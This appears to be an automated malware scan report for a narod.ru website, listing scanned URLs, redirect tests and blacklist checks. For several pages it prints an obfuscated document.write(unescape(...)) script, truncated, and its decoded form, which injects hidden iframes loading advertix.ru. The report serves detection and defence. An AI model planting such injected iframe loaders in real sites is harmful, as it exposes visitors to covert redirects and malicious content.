Scanned pages/files
Request | Server response | Status |
http://imohobodymy.narod.ru/url-385.html | 200 OK Content-Length: 22588 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.694717350498074 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=6Vn9w5sqxfcJJrGwUBNewCND391nrEVh7vWeWCH4zIQrqaQdU5n8cqUjuKtj^jKbqjs;2h0qL!Etv3IepIXyl89SV;UIp;da^KD!e3Zj1zZdbZ2ULTk3vYf7qRs0mmP!;QgbDbTO2ugWNbznqNWMz1iWEr^Rl!eO0uWFXvWVjYCsdsPnAL3dc!6;Q2PGCC45Ifwo | 200 OK Content-Length: 2533 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/sitemap.html | 200 OK Content-Length: 52742 Content-Type: text/html | clean |
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.559008778887712 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=Rggv!!Rf8appN8TBH;tH4KNhjsxhPBxMZkgh7ZMv2!868T59dXPiIc0NbMJTz0LIRu45JDjkFOpUi8t1AUk^eiaSY;D6Z5OcTG12N3M9FzOLUUFOcxQlue0MAEWeu0d7K!MF94luCed4K7gxFuvygbH1W0g4bSVl9xFBLp7ITDD9RX0EaVwZ0FytOULJ8af8u4io | 200 OK Content-Length: 2521 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/ | 200 OK Content-Length: 22192 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.887887551836677 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=dv^j!FPWcqwICFrXpAVYI7m5aOdaKpxMJxQA^!N;T30CHKfgxcRYyBHbzwCEtlsQCveBIMy!GTLBO1Shc1EYIOQbknnSJZP0NPb9ClgWC9FYU0V0!sJJx6Wjpef5S;SNtUWztWGPuvV^RcYmmyL57UE0xNadu3QX^lxistuVdLLdhfEmfZguUW!DH^TZHWyRL;oo | 200 OK Content-Length: 2517 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/?action=login | 200 OK Content-Length: 22192 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.434732307950725 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=FqKw8yeD2^SjqxeSbKz8urF8HSKa0IOWxBW49ztMsmvYiJ25MfC3S;j1Hp9X1AJtZjBrwvRSZS!NGtT9kmcJlFaYySShSkmI9vtMv1ADL;W!b08c;b428JSafWR3gHGVTwdE4MiA^v39FCplr1G57sppMtIIcAlqjaKif;2RPAd2bXw6MGrYZk62x8Ekh196Q2FT | 200 OK Content-Length: 2501 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/url-798.html | 200 OK Content-Length: 20626 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.846469064925532 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=;fAOY1bDCelTJ^2f^7RL4FHEWPASdphw;QL0pYIbHC5YmqA;q57NKTRT5Ey!SFEWIll6OzaSb!bjGkDXtsebz1HBuD3K^JAPj8^MphVVkGB6uPTuTzJ^HNtyGV8dkZazlzHzVQafNADO7blbk4hgy^f6TODCkjkEs;W6bUcUBPuWlaO^PIdgYpqnX4EOcJWwpiso | 200 OK Content-Length: 2505 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: imohobodymy.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 05:44:55 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: imohobodymy.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 05:44:55 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: imohobodymy.narod.ru
Referer: http://www.google.com/search?q=imohobodymy.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: imohobodymy.narod.ru
Referer: http://www.google.com/search?q=imohobodymy.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=imohobodymy.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://imohobodymy.narod.ru/
Result: imohobodymy.narod.ru is not infected or malware details are not published yet.
Result: imohobodymy.narod.ru is not infected or malware details are not published yet.